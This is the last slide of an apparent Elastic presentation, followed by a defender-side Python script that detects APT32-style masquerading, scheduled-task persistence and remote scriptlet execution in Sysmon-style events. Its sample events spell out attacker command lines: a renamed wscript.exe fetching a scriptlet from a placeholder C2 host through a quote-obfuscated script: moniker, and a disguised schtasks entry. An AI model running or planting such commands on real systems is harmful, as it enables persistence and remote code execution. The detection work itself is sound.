  • 32. www.elastic.co Search - Observe - Protect Thank You
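As an added, defender-side example that is not part of the deck or of any Elastic product: the three host-observable techniques from the APT32 walkthrough on slides 18 to 26 (T1036 Masquerading, T1053 Scheduled Task, T1064 Scripting) written as checks over Sysmon-style process-creation events, including the quote-split "sc"r"i"p"t: trick from the slide 22 command line. The field names (Image, OriginalFileName, CommandLine), the SCRIPT_HOSTS set and the sample events are assumptions constructed for this example, and the C2 hostname is a placeholder.

```python
import re
from pathlib import PureWindowsPath

# Technique IDs and names as they appear on the slides.
TECHNIQUES = {"T1036": "Masquerading", "T1053": "Scheduled Task", "T1064": "Scripting"}
# Assumed: script hosts whose embedded OriginalFileName should match the on-disk name.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# A script: moniker that pulls a scriptlet over HTTP(S); matched after quote stripping.
SCRIPT_MONIKER = re.compile(r"script:https?://")


def normalize_cmdline(cmdline: str) -> str:
    """Drop quotes and lower-case, so a split keyword like "sc"r"i"p"t: reads as script:."""
    return cmdline.replace('"', "").lower()


def classify(event: dict) -> list:
    """Map one Sysmon-style process-creation event (assumed field names) to technique IDs."""
    hits = []
    image = PureWindowsPath(event.get("Image", "")).name.lower()
    original = event.get("OriginalFileName", "").lower()
    cmd = normalize_cmdline(event.get("CommandLine", ""))
    # T1036: the PE's own name says script host, but it runs under a different file name.
    if original in SCRIPT_HOSTS and image != original:
        hits.append("T1036")
    # T1053: a task is registered whose action lives in ProgramData rather than a system dir.
    if image == "schtasks.exe" and "/create" in cmd and "programdata" in cmd:
        hits.append("T1053")
    # T1064: a script host (or an explicit VBScript engine switch) fetching a remote scriptlet.
    if (original in SCRIPT_HOSTS or "//e:vbscript" in cmd) and SCRIPT_MONIKER.search(cmd):
        hits.append("T1064")
    return hits


def scan(events: list) -> dict:
    """Return {event index: [(technique id, name), ...]} for every event."""
    return {i: [(t, TECHNIQUES[t]) for t in classify(e)] for i, e in enumerate(events)}


# Constructed sample events modelled on the slide walkthrough; not real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\ProgramData\YING.exe", "OriginalFileName": "wscript.exe",
     "CommandLine": r'C:\ProgramData\YING.exe //E:vbscript /b C:\ProgramData\YANG.txt localhost "sc"r"i"p"t:https://c2.example.invalid/ib.jpg'},
    {"Image": r"C:\Windows\System32\schtasks.exe", "OriginalFileName": "schtasks.exe",
     "CommandLine": r'schtasks /create /sc MINUTE /tn "GoogleUpdateTasksMachineCore" /tr "C:\ProgramData\YING.exe //E:vbscript /b C:\ProgramData\YANG.txt" /mo 11 /F'},
    {"Image": r"C:\Windows\System32\wscript.exe", "OriginalFileName": "wscript.exe",
     "CommandLine": r"wscript.exe C:\Scripts\logon.vbs"},  # benign: names agree, no moniker
]

if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_EVENTS).items():
        print(idx, hits or "no technique matched")
```

The benign third event shows the point of comparing OriginalFileName with the on-disk name: a real wscript.exe running a local script triggers nothing, while the renamed copy in ProgramData does.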